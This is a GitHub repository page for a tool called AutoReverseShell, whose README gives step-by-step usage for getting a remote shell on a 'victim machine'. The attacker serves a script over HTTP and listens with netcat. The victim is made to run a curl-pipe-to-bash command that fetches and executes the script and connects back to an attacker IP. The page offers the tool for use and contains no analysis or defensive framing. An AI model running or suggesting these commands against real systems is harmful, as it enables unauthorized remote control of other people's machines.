Skip to content

Shac0x/AutoReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 

Repository files navigation

Auto Reverse Shell πŸ™

Use πŸ’»

  1. Download rshells.sh on the attacker's machine: wget https://raw.githubusercontent.com/dherrera98/AutoReverseShell/main/rshells.sh
  2. Serve it with a web server, for example: python3 -m http.server 80
  3. Run netcat in another terminal to listen on some port, for example port 443: nc -nlvp 443
  4. On the victim machine run: curl http://<IpWebServer>:<PortWebServer>/rshell.sh | bash -s <AttackerIP> <NetcatPort>
  5. Look at the netcat terminal and you will see the shell of the victim.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages